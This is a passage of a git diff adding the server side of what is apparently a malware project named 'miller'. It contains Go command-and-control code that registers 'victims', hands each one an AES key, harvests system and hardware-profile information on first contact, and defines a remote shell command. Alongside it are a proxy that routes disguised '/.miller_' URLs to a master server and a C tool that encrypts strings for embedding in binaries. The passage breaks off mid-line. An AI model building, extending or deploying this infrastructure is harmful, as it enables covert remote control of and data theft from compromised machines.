${MILLER_HDRDIR} ${MILLER_TOOLSDIR}) + + +add_executable(strings-host ${STRINGS_SRC}) +target_include_directories(strings-host PRIVATE ${MILLER_HDRDIR} ${MILLER_HDRDIR_CREATED} ${MILLER_TOOLSDIR}) +target_compile_definitions(strings-host PRIVATE _PRE_RELEASE=1 _STRINGS_BIN=1) + + +add_library(pyloader SHARED ${MILLER_TOOLSDIR}/helper.c pyloader.c) +target_include_directories(pyloader PRIVATE ${PYTHON_INCDIR} ${MILLER_HDRDIR} ${MILLER_TOOLSDIR}) +target_compile_definitions(pyloader PRIVATE _USE_PYTHON=1 _LOADER_ENDMARKER=${LOADER_ENDMARKER}) +set_target_properties(pyloader PROPERTIES PREFIX "") +set_target_properties(pyloader PROPERTIES COMPILE_FLAGS "-fPIC -O2 -shared -Wextra -Wno-unused-parameter") + + +add_library(pycrypt SHARED ${MILLER_SRCDIR}/utils.c ${MILLER_SRCDIR}/crypt.c ${MILLER_SRCDIR}/aes.c ${MILLER_TOOLSDIR}/helper.c pycrypt.c) +target_include_directories(pycrypt PRIVATE ${PYTHON_INCDIR} ${MILLER_HDRDIR} ${MILLER_TOOLSDIR}) +target_compile_definitions(pycrypt PRIVATE _USE_PYTHON=1) +set_target_properties(pycrypt PROPERTIES PREFIX "") +set_target_properties(pycrypt PROPERTIES COMPILE_FLAGS "-fPIC -O2 -shared -Wextra -Wno-unused-parameter -Wno-sign-compare") + + +macro(host_tools_install target destdir) + set(${target}_FILE "${destdir}/${target}") + + add_custom_command(OUTPUT ${${target}_FILE} /force-run + COMMAND ${CMAKE_COMMAND} -E copy_if_different "$<TARGET_FILE:${target}>" "${${target}_FILE}" + ) + add_custom_target(${target}-install + ALL + DEPENDS ${target} ${${target}_FILE} + ) + add_dependencies(${target}-install ${target}) +endmacro() + +host_tools_install(hdr_crypt-host ${INSTALL_DEST}) +host_tools_install(pyloader ${INSTALL_DEST}) +host_tools_install(pycrypt ${INSTALL_DEST}) +host_tools_install(strings-host ${INSTALL_DEST}) diff --git a/source/tools/host/go/cnclib/miller_consts.go b/source/tools/host/go/cnclib/miller_consts.go new file mode 100644 index 0000000..388c25c --- /dev/null +++ b/source/tools/host/go/cnclib/miller_consts.go @@ -0,0 +1,98 @@ +package miller + +import ( + "fmt" +) + + +const KEY_256 uint8 = (256/8) +const MARKER_SIZ uint8 = 8 +const AESKEY_SIZ uint8 = 32 +const HW_PROFILE_GUIDLEN uint8 = 39 +const MAX_PROFILE_LEN uint8 = 80 + +const RF_INITIAL uint8 = 0x00 +const RF_AGAIN uint8 = 0x41 +const RF_ERROR uint8 = 0x42 +const RF_OK uint8 = 0x66 + +const RC_INFO uint16 = 0xACAB +const RC_REGISTER uint16 = 0xAABB +const RC_PING uint16 = 0x0043 +const RC_SHELL uint16 = 0x0044 + +func RCtoString(rc uint16) string { + switch rc { + case RC_INFO: + return "RC_INFO" + case RC_REGISTER: + return "RC_REGISTER" + case RC_PING: + return "RC_PING" + case RC_SHELL: + return "RC_SHELL" + default: + return "UNKNOWN" + } +} + +type HttpResp struct { + StartMarker [MARKER_SIZ]byte + RespFlags uint8 + RespCode uint16 + Pkgsiz uint32 + Pkgbuf []byte +} + +func (hr *HttpResp) String() string { + return fmt.Sprintf("Marker: '%s', Flags: 0x%04X, Code: 0x%04X, " + + "PKGSIZ: 0x%04X, PKGBUF: '%v'", + hr.StartMarker, hr.RespFlags, hr.RespCode, + hr.Pkgsiz, hr.Pkgbuf) +} + +type RespRegister struct { + Aeskey [AESKEY_SIZ]byte + NextPing uint32 +} + +type RespPong struct { + NextPing uint32 +} + +type RespShell struct { + Operation uint8 + Showcmd uint8 + FileLen uint16 + ParamLen uint16 + DirLen uint16 + Data []byte +} + +type SYSTEM_INFO_32 struct { + ProcessorArchitecture uint16 + Reserved uint16 + PageSize uint32 + MinimumApplicationAddress uint32 + MaximumApplicationAddress uint32 + ActiveProcessorMask uint32 + NumberOfProcessors uint32 + ProcessorType uint32 + AllocationGranularity uint32 + ProcessorLevel uint16 + ProcessorRevision uint16 +} + +type HW_PROFILE_INFOA struct { + DockInfo uint32 + HwProfileGuid [HW_PROFILE_GUIDLEN]byte + HwProfileName [MAX_PROFILE_LEN]byte +} + +type ReqInfo struct { + SI SYSTEM_INFO_32 + HW HW_PROFILE_INFOA + CmdLineLen uint16 + DevsLen uint8 + Data []byte +} diff --git a/source/tools/host/go/cnclib/miller_victim.go b/source/tools/host/go/cnclib/miller_victim.go new file mode 100644 index 0000000..15f7917 --- /dev/null +++ b/source/tools/host/go/cnclib/miller_victim.go @@ -0,0 +1,165 @@ +package miller + +import ( + "github.com/zhuangsirui/binpacker" + + "fmt" + "time" + "encoding/json" + "encoding/binary" + //"encoding/hex" + "bytes" +) + + +type Victim struct { + Last_rf_rx uint8 `json:"LRFRX"` + Last_rc_rx uint16 `json:"LRCRX"` + Last_rf_tx uint8 `json:"LRFTX"` + Last_rc_tx uint16 `json:"LRCTX"` + Last_active time.Time `json:"LA"` + Last_json time.Time `json:"LJ"` + Aeskey [AESKEY_SIZ]byte `json:"AK"` + Requests uint `json:"REQS"` +} + + +func NewVictim() *Victim { + return &Victim{ 0, 0, 0, 0, time.Time{}, time.Time{}, [AESKEY_SIZ]byte{}, 0 } +} + +func (v *Victim) Reset() { + v.Last_rf_rx = 0 + v.Last_rf_rx = 0 +} + +func (v *Victim) String() string { + return fmt.Sprintf("last_rf_rx: 0x%04X, last_rc_rx: 0x%04X, last_rf_tx: 0x%04X, " + + "last_rc_tx: 0x%04X, aeskey: '%v', requests: %v", + v.Last_rf_rx, v.Last_rc_rx, v.Last_rf_tx, v.Last_rc_tx, v.Aeskey, v.Requests) +} + +func (v *Victim) ToJSON(debug_only bool) ([]byte, error) { + if !debug_only { + v.Last_json = time.Now() + } + return json.Marshal(v) +} + +func (v *Victim) FromJSON(json_input []byte) error { + return json.Unmarshal(json_input, v) +} + +func copySliceToArray(dest []byte, src []byte, siz int) error { + if len(src) != len(dest) { + return fmt.Errorf("parseValue: %d bytes (src) != %d bytes (dest)", len(src), len(dest)) + } + copied := copy(dest[:], src) + if copied != siz { + return fmt.Errorf("parseMarker: copied only %d instead of %d", copied, siz) + } + return nil +} + +func ParseMarker(dest *[MARKER_SIZ]byte, src []byte) error { + return copySliceToArray(dest[:], src, int(MARKER_SIZ)) +} + +func ParseMarkerResponse(response *HttpResp, src []byte) error { + return ParseMarker(&response.StartMarker, src) +} + +func ParseAESKey(dest *[AESKEY_SIZ]byte, src []byte) error { + return copySliceToArray(dest[:], src, int(AESKEY_SIZ)) +} + +func ParseAESKeyResponse(response *RespRegister, src []byte) error { + return ParseAESKey(&response.Aeskey, src) +} + +func (v *Victim) SetAESKey(aeskey []byte) error { + return ParseAESKey(&v.Aeskey, aeskey) +} + +func (v *Victim) HasAESKey() bool { + var nullkey [AESKEY_SIZ]byte + return !bytes.Equal(v.Aeskey[:], nullkey[:]) +} + +func (v *Victim) ParseRequest(dest []byte, response *HttpResp) error { + buffer := bytes.NewBuffer(dest) + unpacker := binpacker.NewUnpacker(binary.LittleEndian, buffer) + marker_bytearr, err := unpacker.ShiftBytes(uint64(MARKER_SIZ)) + if err != nil { + return fmt.Errorf("marker: %s", err) + } + if copy(response.StartMarker[:], marker_bytearr) != int(MARKER_SIZ) { + return fmt.Errorf("marker: copy failed") + } + v.Last_active = time.Now() + unpacker.FetchUint8(&response.RespFlags) + v.Last_rf_rx = response.RespFlags + unpacker.FetchUint16(&response.RespCode) + v.Last_rc_rx = response.RespCode + if !v.HasAESKey() { + v.Last_rc_rx = RC_REGISTER + } + unpacker.FetchUint32(&response.Pkgsiz) + response.Pkgbuf, err = unpacker.ShiftBytes(uint64(response.Pkgsiz)) + if err != nil { + return fmt.Errorf("pkgbuf: %s", err) + } + v.Requests++ + return nil +} + +func (v *Victim) buildResponse(response *HttpResp, dest []byte) ([]byte, error) { + buffer := bytes.Buffer{} + packer := binpacker.NewPacker(binary.LittleEndian, &buffer) + packer.PushBytes(response.StartMarker[:]) + packer.PushUint8(response.RespFlags) + v.Last_rf_tx = response.RespFlags + packer.PushUint16(response.RespCode) + v.Last_rc_tx = response.RespCode + packer.PushUint32(response.Pkgsiz) + packer.PushBytes(response.Pkgbuf) + err := packer.Error() + if err != nil { + v.Reset() + return nil, err + } + return append(dest, buffer.Bytes()...), nil +} + +func (v *Victim) BuildRegisterResponse(response *HttpResp, respreg *RespRegister, dest []byte) ([]byte, error) { + buffer := bytes.Buffer{} + packer := binpacker.NewPacker(binary.LittleEndian, &buffer) + packer.PushBytes(respreg.Aeskey[:]) + packer.PushUint32(respreg.NextPing) + err := packer.Error() + if err != nil { + return nil, err + } + response.Pkgsiz = uint32(len(buffer.Bytes())) + response.Pkgbuf = buffer.Bytes() + return v.buildResponse(response, dest) +} + +func (v *Victim) BuildPongResponse(response *HttpResp, respong *RespPong, dest []byte) ([]byte, error) { + buffer := bytes.Buffer{} + packer := binpacker.NewPacker(binary.LittleEndian, &buffer) + packer.PushUint32(respong.NextPing) + err := packer.Error() + if err != nil { + return nil, err + } + response.Pkgsiz = uint32(len(buffer.Bytes())) + response.Pkgbuf = buffer.Bytes() + return v.buildResponse(response, dest) +} + +func (v *Victim) BuildInfoResponse(response *HttpResp, dest []byte) ([]byte, error) { + response.Pkgsiz = 0 + response.Pkgbuf = nil + return v.buildResponse(response, dest) +} diff --git a/source/tools/host/go/cncmaster/Makefile b/source/tools/host/go/cncmaster/Makefile new file mode 100644 index 0000000..7f026da --- /dev/null +++ b/source/tools/host/go/cncmaster/Makefile @@ -0,0 +1,37 @@ +GOCC ?= go +RM ?= rm +GOPATH := $(shell realpath ./deps) +INSTALL ?= install +DESTDIR ?= . +BIN := cncmaster +ifeq ($(strip $(GOARCH)),) +BIN := $(BIN)-host +else +BIN := $(BIN)-$(GOARCH)$(GOARM) +endif +SRCS := main.go http.go +DEP_MUX := deps/src/github.com/gorilla/mux/mux.go + +all: $(BIN) + +%.go: + +$(DEP_MUX): + GOPATH=$(GOPATH) $(GOCC) get -v -u github.com/gorilla/mux + +$(BIN): $(DEP_MUX) $(SRCS) +ifeq ($(strip $(IS_GCCGO)),) + GOPATH=$(GOPATH) $(GOCC) build -ldflags="-s -w" -o $(BIN) . +else + GOPATH=$(GOPATH) $(GOCC) build -gccgoflags="-s -w -pthread" -o $(BIN) . +endif + +$(BIN)-install: $(BIN) + $(INSTALL) -D $(BIN) $(DESTDIR)/$(BIN) + +install: $(BIN)-install + +clean: + $(RM) -f $(BIN) $(DESTDIR)/$(BIN) + +.PHONY: all diff --git a/source/tools/host/go/cncmaster/deps/src/github.com/gorilla/mux b/source/tools/host/go/cncmaster/deps/src/github.com/gorilla/mux new file mode 160000 +Subproject d83b6ffe499a29cc05fc977988d039285177962 diff --git a/source/tools/host/go/cncmaster/http.go b/source/tools/host/go/cncmaster/http.go new file mode 100644 index 0000000..a9648ce --- /dev/null +++ b/source/tools/host/go/cncmaster/http.go @@ -0,0 +1,29 @@ +package main + +import ( + "github.com/gorilla/mux" + + "log" + "net/http" +) + + +func miller_http_handler(w http.ResponseWriter, r *http.Request) { + params := mux.Vars(r) + sid, ok := params["sid"] + if !ok { + return + } + marker, ok := params["marker"] + if !ok { + return + } + rnd, ok := params["rnd"] + if !ok { + return + } + + log.Printf("SID '%s' with MARKER '%s' and RND '%s'", sid, marker, rnd) + + w.Write([]byte("Hello!")) +} diff --git a/source/tools/host/go/cncmaster/main.go b/source/tools/host/go/cncmaster/main.go new file mode 100644 index 0000000..1845800 --- /dev/null +++ b/source/tools/host/go/cncmaster/main.go @@ -0,0 +1,31 @@ +package main + +import ( + "github.com/gorilla/mux" + + "log" + "net/http" +) + + +const verbose = true +const listen_tpl = "127.0.0.1:8081" + +func main() { + rtr := mux.NewRouter() + rtr.HandleFunc("/.miller_{sid:[a-zA-Z0-9]{32}}_{marker:[a-zA-Z0-9]{8}}_{rnd:[a-zA-Z0-9]{64}}", miller_http_handler).Methods("POST") + + http.Handle("/", rtr) + + log.Println("CNCMASTER: Listening on " + listen_tpl + "...") + http.ListenAndServe(listen_tpl, logRequest(http.DefaultServeMux)) +} + +func logRequest(handler http.Handler) http.Handler { + return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + if verbose { + log.Printf("%s %s %s\n", r.RemoteAddr, r.Method, r.URL) + } + handler.ServeHTTP(w, r) + }) +} diff --git a/source/tools/host/go/cncproxy/Makefile b/source/tools/host/go/cncproxy/Makefile new file mode 100644 index 0000000..44e3b32 --- /dev/null +++ b/source/tools/host/go/cncproxy/Makefile @@ -0,0 +1,42 @@ +GOCC ?= go +RM ?= rm +GOPATH := $(shell realpath ./deps) +INSTALL ?= install +DESTDIR ?= . +BIN := cncproxy +ifeq ($(strip $(GOARCH)),) +BIN := $(BIN)-host +else +BIN := $(BIN)-$(GOARCH)$(GOARM) +endif +SRCS := main.go manager.go http.go +DEP_CNCLIB := ../cnclib/miller_consts.go ../cnclib/miller_victim.go +DEP_MUX := deps/src/github.com/gorilla/mux/mux.go +DEP_PACKER := deps/src/github.com/zhuangsirui/binpacker/packer.go + +all: $(BIN) + +%.go: + +$(DEP_MUX): + GOPATH=$(GOPATH) $(GOCC) get -v -u github.com/gorilla/mux + +$(DEP_PACKER): + GOPATH=$(GOPATH) $(GOCC) get -v github.com/zhuangsirui/binpacker + +$(BIN): $(DEP_MUX) $(DEP_PACKER) $(DEP_CNCLIB) $(SRCS) +ifeq ($(strip $(IS_GCCGO)),) + GOPATH=$(GOPATH) $(GOCC) build -ldflags="-s -w" -o $(BIN) . +else + GOPATH=$(GOPATH) $(GOCC) build -gccgoflags="-s -w -pthread" -o $(BIN) . +endif + +$(BIN)-install: $(BIN) + $(INSTALL) -D $(BIN) $(DESTDIR)/$(BIN) + +install: $(BIN)-install + +clean: + $(RM) -f $(BIN) $(DESTDIR)/$(BIN) + +.PHONY: all diff --git a/source/tools/host/go/cncproxy/deps/src/github.com/gorilla/mux b/source/tools/host/go/cncproxy/deps/src/github.com/gorilla/mux new file mode 160000 +Subproject d83b6ffe499a29cc05fc977988d039285177962 diff --git a/source/tools/host/go/cncproxy/deps/src/github.com/zhuangsirui/binpacker b/source/tools/host/go/cncproxy/deps/src/github.com/zhuangsirui/binpacker new file mode 160000 +Subproject 08a1b297435a414bec3ccf4215ff546dba41815 diff --git a/source/tools/host/go/cncproxy/http.go b/source/tools/host/go/cncproxy/http.go new file mode 100644 index 0000000..8e82662 --- /dev/null +++ b/source/tools/host/go/cncproxy/http.go @@ -0,0 +1,224 @@ +package main + +import ( + "../cnclib" + "github.com/gorilla/mux" + + "fmt" + "log" + "io" + "net/http" + "encoding/binary" + "encoding/hex" + "crypto/rand" + "bytes" +) + + +func miller_to_master(v *miller.Victim, url *string) error { + _, err := v.ToJSON(false) + if err != nil { + return err + } + return nil +} + +func miller_http_request(v *miller.Victim, r *http.Request) (bool, error) { + var valid bool + var req miller.HttpResp + var err error + read_form, err := r.MultipartReader() + if err != nil { + return false, err + } + + for { + part, err := read_form.NextPart() + if err == io.EOF { + break + } + + if part.FormName() == "upload" { + buf := new(bytes.Buffer) + buf.ReadFrom(part) + if verbose { + log.Printf("Request (upload; %d bytes):\n%s", len(buf.String()), hex.Dump(buf.Bytes())) + } + err = v.ParseRequest(buf.Bytes(), &req) + if err != nil { + return false, err + } + if verbose { + log.Printf("HTTP REQUEST(%v)", &req) + } + valid = true + } + } + + if !valid { + return false, nil + } + return true, nil +} + +func miller_randbytes(n int) ([]byte, error) { + b := make([]byte, n) + _, err := rand.Read(b) + if err != nil { + return nil, err + } + + return b, nil +} + +func miller_state_machine(v *miller.Victim, marker *string) ([]byte, error) { + var err error + var buffer []byte + var resp miller.HttpResp + + err = miller.ParseMarkerResponse(&resp, []byte(*marker)) + if err != nil { + return nil, err + } + + log.Printf("Miller state machine got a '%s'", miller.RCtoString(v.Last_rc_rx)) + switch v.Last_rc_rx { + case miller.RC_REGISTER: + resp.RespFlags = miller.RF_OK + resp.RespCode = miller.RC_REGISTER + resp_reg, err := NewRegisterResponse(5, v) + if err != nil { + return nil, err + } + buffer, err = v.BuildRegisterResponse(&resp, resp_reg, buffer) + if err != nil { + return nil, err + } + if v.Last_rf_rx == miller.RF_INITIAL && v.Requests == 1 { + log.Printf("FIRST CONTACT: Grabbing some information !!") + resp.RespFlags = miller.RF_AGAIN + resp.RespCode = miller.RC_INFO + buffer, err = v.BuildInfoResponse(&resp, buffer) + } + break + case miller.RC_INFO: + resp.RespFlags = miller.RF_OK + resp.RespCode = miller.RC_PING + resp_pong := NewPongResponse(5) + buffer, err = v.BuildPongResponse(&resp, &resp_pong, buffer) + if err != nil { + return nil, err + } + break + case miller.RC_PING: + resp.RespFlags = miller.RF_OK + resp.RespCode = miller.RC_PING + resp_pong := NewPongResponse(5) + buffer, err = v.BuildPongResponse(&resp, &resp_pong, buffer) + if err != nil { + return nil, err + } + break + default: + return nil, fmt.Errorf("invalid response code 0x%04X", v.Last_rc_rx) + } + + return buffer, nil +} + +func miller_http_handler(w http.ResponseWriter, r *http.Request) { + params := mux.Vars(r) + sid, ok := params["sid"] + if !ok { + return + } + marker, ok := params["marker"] + if !ok { + return + } + rnd, ok := params["rnd"] + if !ok { + return + } + + fake_resp := miller.HttpResp{} + if r.ContentLength < int64(binary.Size(fake_resp)) { + log.Printf("Fake response has invalid size.") + http.NotFound(w, r) + return + } + + if verbose { + log.Printf("---------- %s ----------", "REQUEST") + } + log.Printf("SID '%s' with MARKER '%s' and RND '%s'", sid, marker, rnd) + + var err error + var v *miller.Victim + v = mgr.GetVictim(&sid) + if v == nil { + v = miller.NewVictim() + mgr.SetVictim(v, &sid) + } + if !mgr.PushVictim(&sid) { + log.Printf("ERROR Victim is already known to the Manager!") + http.NotFound(w, r) + return + } + + valid, err := miller_http_request(v, r) + if err != nil { + log.Printf("ERROR miller_http_request: '%s'", err) + } + if !valid { + log.Printf("ERROR Victim HTTP Request was invalid!") + http.NotFound(w, r) + return + } + + buffer, err := miller_state_machine(v, &marker) + if err != nil { + log.Printf("ERROR miller_state_machine: '%s'", err) + } + if buffer == nil { + log.Printf("ERROR binary buffer was empty after miller_state_machine") + http.NotFound(w, r) + return + } + + if v.Last_rc_rx == miller.RC_REGISTER && v.Requests > 1 { + log.Printf("WARNING: Victim '%s' RE-REGISTERED !!", sid) + } + + if verbose { + log.Printf("Response (%d bytes):\n%s", len(buffer), hex.Dump(buffer)) + log.Printf("VICTIM STATE(%s)", v) + json_out, err := v.ToJSON(true) + if err == nil { + log.Printf("VICTIM JSON(%s)", string(json_out)) + } + log.Printf("---------- %s ----------", "EoF REQUEST/RESPONSE") + } + + mgr.PopVictim(&sid) + + w.Write(buffer) +} + +func NewRegisterResponse(next_ping uint32, victim *miller.Victim) (*miller.RespRegister, error) { + respreg := miller.RespRegister{ [miller.AESKEY_SIZ]byte{}, next_ping } + aeskey, err := miller_randbytes(int(miller.KEY_256)) + if err != nil { + return nil, err + } + err = miller.ParseAESKeyResponse(&respreg, aeskey) + if err != nil { + return nil, err + } + victim.SetAESKey(aeskey) + return &respreg, nil +} + +func NewPongResponse(next_ping uint32) miller.RespPong { + return miller.RespPong{ next_ping } +} diff --git a/source/tools/host/go/cncproxy/main.go b/source/tools/host/go/cncproxy/main.go new file mode 100644 index 0000000..b5cc9ef --- /dev/null +++ b/source/tools/host/go/cncproxy/main.go @@ -0,0 +1,48 @@ +package main + +import ( + "github.com/gorilla/mux" + + "flag" + "log" + "net/http" +) + + +var mgr manager +var verbose bool + +const default_listen_tpl = "127.0.0.1:8080" +const default_master_tpl = "127.0.0.1:8081" +const default_verbose = false + + +func main() { + listen_tpl := flag.String("listen", default_listen_tpl, + "CNCProxy listen address.") + master_tpl := flag.String("master", default_master_tpl, + "CNCMaster connect address.") + verbose = *flag.Bool("verbose", default_verbose, + "CNCProxy verbose mode") + flag.Parse() + + mgr = NewManager() + rtr := mux.NewRouter() + /* /.miller_pahhj0099wjtu87vdgtl8fq8k4zmh0is_sbmkuj97_rg38n6bop9m5htrbeyyx0ljx26gbjxdx5nztp4a1wfowdsyyqnzts0r440logk91 */ + rtr.HandleFunc("/.miller_{sid:[a-zA-Z0-9]{32}}_{marker:[a-zA-Z0-9]{8}}_{rnd:[a-zA-Z0-9]{64}}", miller_http_handler).Methods("POST") + + http.Handle("/", rtr) + + log.Println("CNCProxy: Listening on " + *listen_tpl + "...") + log.Println("CNCProxy: Forwarding to CNCMaster at " + *master_tpl) + log.Fatal(http.ListenAndServe(*listen_tpl, logRequest(http.DefaultServeMux))) +} + +func logRequest(handler http.Handler) http.Handler { + return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + if verbose { + log.Printf("%s %s %s\n", r.RemoteAddr, r.Method, r.URL) + } + handler.ServeHTTP(w, r) + }) +} diff --git a/source/tools/host/go/cncproxy/manager.go b/source/tools/host/go/cncproxy/manager.go new file mode 100644 index 0000000..cd778be --- /dev/null +++ b/source/tools/host/go/cncproxy/manager.go @@ -0,0 +1,84 @@ +package main + +import ( + "../cnclib" + + "sync" +) + +type victim_data struct { + v *miller.Victim + in_use bool + lock sync.Mutex +} + +type manager struct { + victims map[string]victim_data + lock sync.Mutex +} + + +func NewManager() manager { + return manager{ make(map[string]victim_data), sync.Mutex{} } +} + +func (m *manager) SetVictim(v *miller.Victim, sid *string) { + m.lock.Lock() + defer m.lock.Unlock() + vd := victim_data{} + vd.v = v + m.victims[*sid] = vd +} + +func (m *manager) getVictim(sid *string) *victim_data { + m.lock.Lock() + defer m.lock.Unlock() + ret, ok := m.victims[*sid] + if ok { + return &ret + } + return nil +} + +func (m *manager) GetVictim(sid *string) *miller.Victim { + vd := m.getVictim(sid) + if vd == nil { + return nil + } + if !m.VictimInUse(sid) { + return vd.v + } + return nil +} + +func (m *manager) VictimInUse(sid *string) bool { + vd := m.getVictim(sid) + if vd == nil { + return false + } + vd.lock.Lock() + defer vd.lock.Unlock() + return vd.in_use +} + +func (m *manager) PushVictim(sid *string) bool { + if m.VictimInUse(sid) { + return false + } + vd := m.getVictim(sid) + vd.lock.Lock() + defer vd.lock.Unlock() + vd.in_use = true + return true +} + +func (m *manager) PopVictim(sid *string) bool { + if !m.VictimInUse(sid) { + return false + } + vd := m.getVictim(sid) + vd.lock.Lock() + defer vd.lock.Unlock() + vd.in_use = false + return true +} diff --git a/source/tools/host/hdr_crypt.c b/source/tools/host/hdr_crypt.c new file mode 100644 index 0000000..2461351 --- /dev/null +++ b/source/tools/host/hdr_crypt.c @@ -0,0 +1,417 @@ +#include <stdio.h> +#include <stdlib.h> +#include <unistd.h> +#include <string.h> +#include <ctype.h> +#include <time.h> + +#include "utils.h" +#include "crypt.h" +#include "aes.h" + +#define MAX_LINE 65535 + + +static aes_ctx_t* ctx = NULL; +static unsigned char aeskey[KEY_256]; +static uint32_t xorkey; +static unsigned xor_align = 4; + + +char* alignedCopyBuffer(char* orig, unsigned* orig_len, unsigned alignment) +{ + unsigned pad = *orig_len % alignment; + unsigned new_len = *orig_len + alignment - pad; + + char* out = calloc(new_len, sizeof(char)); + memcpy(out, orig, *orig_len); + + if (pad > 0) + out[*orig_len] = 0; + for (unsigned i = (*orig_len)+1; i < new_len; ++i) { + out[i] = (char)__rdtsc(); + } + *orig_len = new_len; + return out; +} + +enum defType { DT_DEFAULT, DT_SECTION, DT_ENDSECTION }; +struct defines { + struct defines* next; + enum defType dt; + char defName[0]; +}; +static struct defines* defs = NULL; + +void addDefineName(const char* line, enum defType type, struct defines** current) +{ + if (!current) return; + + const char* strb = strchr(line, ' '); + if (!strb) return; + + while (*(++strb) == ' ') {} + + char* stre = strchr(strb, ' '); + if (!stre) return; + + size_t len = stre - strb; + (*current)->next = calloc(sizeof(struct defines) + len + 1, 1); + (*current) = (*current)->next; + memcpy( &(*current)->defName[0], &strb[0], len ); + (*current)->dt = type; +} + +struct entOpts { + const char* fmt; + const char* com; + const char* ent; + const char* overw; +}; + +void writeOrAbort(const char* outbuf, int outsiz, FILE* outfile) +{ + size_t written = fwrite(outbuf, 1, outsiz, outfile); + if (written != outsiz) { + fprintf(stderr, "Error while writing \"%.*s\" to OUTPUT stream\n", (outsiz > 20 ? 20 : outsiz), outbuf); + abort(); + } +} + +int addStrEntry(FILE* outfile, const char* name, const struct defines* begin, const struct entOpts* opts, bool addSections) +{ + const char* name_section = NULL; + const struct defines* cur = begin; + while ( (cur = cur->next) ) { + char* outbuf = NULL; + int outsiz = 0; + + /* error checking */ + if (cur->dt == DT_SECTION && name_section && addSections) { + fprintf(stderr, "Found SECTION \"%s\" without ENDSECTION for \"%s\"\n", &cur->defName[0], name_section); + return 1; + } + if (cur->dt == DT_ENDSECTION && !name_section && addSections) { + fprintf(stderr, "Found ENDSECTION \"%s\" without ECTION for \"%s\"\n", &cur->defName[0], name_section); + return 2; + } + + /* prepare output buffer */ + if ((opts->fmt && cur->dt == DT_SECTION && !name_section) || (!name_section && !addSections)) { + /* SECTIONS: generate xor string entries as simple macro */ + + if (!addSections) { + name_section = "ROOT"; + const size_t flen = strlen(opts->fmt); + const size_t elen = strlen(opts->ent); + char* fmt = calloc(flen+elen+1, sizeof(char)); + strncpy(fmt, opts->fmt, flen); + strncpy(fmt+flen, opts->ent, elen); + outsiz = asprintf(&outbuf, fmt, opts->com, name, name_section, &cur->defName[0]); + free(fmt); + } else { + name_section = &cur->defName[0]; + outsiz = asprintf(&outbuf, opts->fmt, opts->com, name, name_section); + } + } else + if (opts->fmt && cur->dt == DT_ENDSECTION && name_section && addSections) { + name_section = NULL; + fseek(outfile, -4, SEEK_CUR); + writeOrAbort(opts->overw, strlen(opts->overw), outfile); + } else + if (name_section && cur->dt == DT_DEFAULT) { + outsiz = asprintf(&outbuf, opts->ent, &cur->defName[0]); + } + /* ignore section entries if user wants only root section entries */ + if (!addSections && cur->dt == DT_SECTION) { + while ( (cur = cur->next) && cur->dt != DT_ENDSECTION ) {} + } + + /* write output buffer */ + if (outsiz > 0) { + writeOrAbort(outbuf, outsiz, outfile); + free(outbuf); + } + } + fseek(outfile, -4, SEEK_CUR); + writeOrAbort(opts->overw, strlen(opts->overw), outfile); + + return 0; +} + +/* string struct defines for each section */ +static const char fmt_strsec[] = "%s\n#define %s_%s_STRINGS \\\n"; +static const char com_strsec[] = "\n\n/* for use in string struct */"; +static const char fmt_strent[] = " STRENT(%s), \\\n"; +/* replace last 4 bytes with newlines */ +static const char overw[] = "\n\n\n\n"; + +int addStrStructEntries(FILE* outfile, const char* name, const struct defines* begin, bool addSections) +{ + struct entOpts opts = {0}; + opts.fmt = fmt_strsec; + opts.com = com_strsec; + opts.ent = fmt_strent; + opts.overw = overw; + return addStrEntry(outfile, name, begin, &opts, addSections); +} + +/* string enum defines for each section */ +static const char fmt_enmsec[] = "%s\n#define %s_%s_ENUM \\\n"; +static const char com_enmsec[] = "\n\n/* for use in string enum */"; +static const char fmt_enment[] = " %s_ENUM, \\\n"; + +int addStrEnumEntries(FILE* outfile, const char* name, const struct defines* begin, bool addSections) +{ + struct entOpts opts = {0}; + opts.fmt = fmt_enmsec; + opts.com = com_enmsec; + opts.ent = fmt_enment; + opts.overw = overw; + return addStrEntry(outfile, name, begin, &opts, addSections); +} + +char* gencstr(unsigned char* buf, size_t siz) +{ + int i; + char* buf_str = (char*)calloc(1, 4*siz + 1); + char* buf_ptr = buf_str; + for (i = 0; i < siz; i++) + { + buf_ptr += sprintf(buf_ptr, "\\x%02X", buf[i]); + } + *(buf_ptr) = '\0'; + return buf_str; +} + +void genUnescapedBuf(char* buf, uint32_t* siz) +{ + int i; + size_t found = 0; + bool hasBackslash = false; + for (i = 0; i < *siz; i++) + { + unsigned char byte = 0x00; + + if (buf[i] == '\\') { + if (hasBackslash) { + memmove(&buf[i], &buf[i+1], (*siz)-i-1); + (*siz)--; + buf[(*siz)] = '\0'; + } + hasBackslash = !hasBackslash; + continue; + } + + if (hasBackslash && buf[i] == 'x') { + i++; + for (int j = i; j < i+2; j++) { + char cur = tolower(buf[j]); + unsigned char shifter = (j == i ? 4 : 0); + if (cur == '\0') break; + if (cur >= 48 && cur <= 57) { + byte |= (cur - 48) << shifter; + } else if (cur >= 97 && cur <= 102) { + byte |= (cur - 97 + 10) << shifter; + } + } + i += 2; + buf[i-4] = byte; + memmove(buf+i-3, buf+i, (*siz)-i); + i -= 4; + hasBackslash = false; + found++; + } else + if (hasBackslash) + hasBackslash = false; + } + *siz -= (found*3); +} + +int doSelfTest(void) +{ + int ret = 0; + + unsigned char __aeskey[KEY_256+1]; + memset(&__aeskey[0], '\0', sizeof(unsigned char)*(KEY_256+1)); + aes_randomkey(&__aeskey[0], KEY_256); + aes_ctx_t* __ctx = aes_alloc_ctx(&__aeskey[0], KEY_256); + + char __ptext[16] = "Attack at dawn!"; + char __ctext[16]; + char __decptext[16]; + aes_encrypt(__ctx, (unsigned char*)__ptext, (unsigned char*)__ctext); + aes_decrypt(__ctx, (unsigned char*)__ctext, (unsigned char*)__decptext); + if (strcmp(__ptext, __decptext) != 0) { + ret = 1; + goto selftest_fin; + } + + char __inbuf[] = "This is a short short short short short text, but bigger than 16 bytes ..."; + uint32_t __outlen = 0; + char* __outbuf = aes_crypt_s(__ctx, __inbuf, sizeof(__inbuf), &__outlen, true); + uint32_t __orglen = 0; + char* __orgbuf = aes_crypt_s(__ctx, __outbuf, __outlen, &__orglen, false); + + if (strcmp(__inbuf, __orgbuf) != 0) + ret = 1; + +selftest_fin: + free(__orgbuf); + free(__outbuf); + aes_free_ctx(__ctx); + return ret; +} + +int main(int argc, char** argv) +{ + aes_init(); + struct defines* cur = defs = calloc(sizeof(struct defines), 1); + int ret = -1; + if ( (ret = doSelfTest()) != 0) { + printf("%s: SelfTest failed 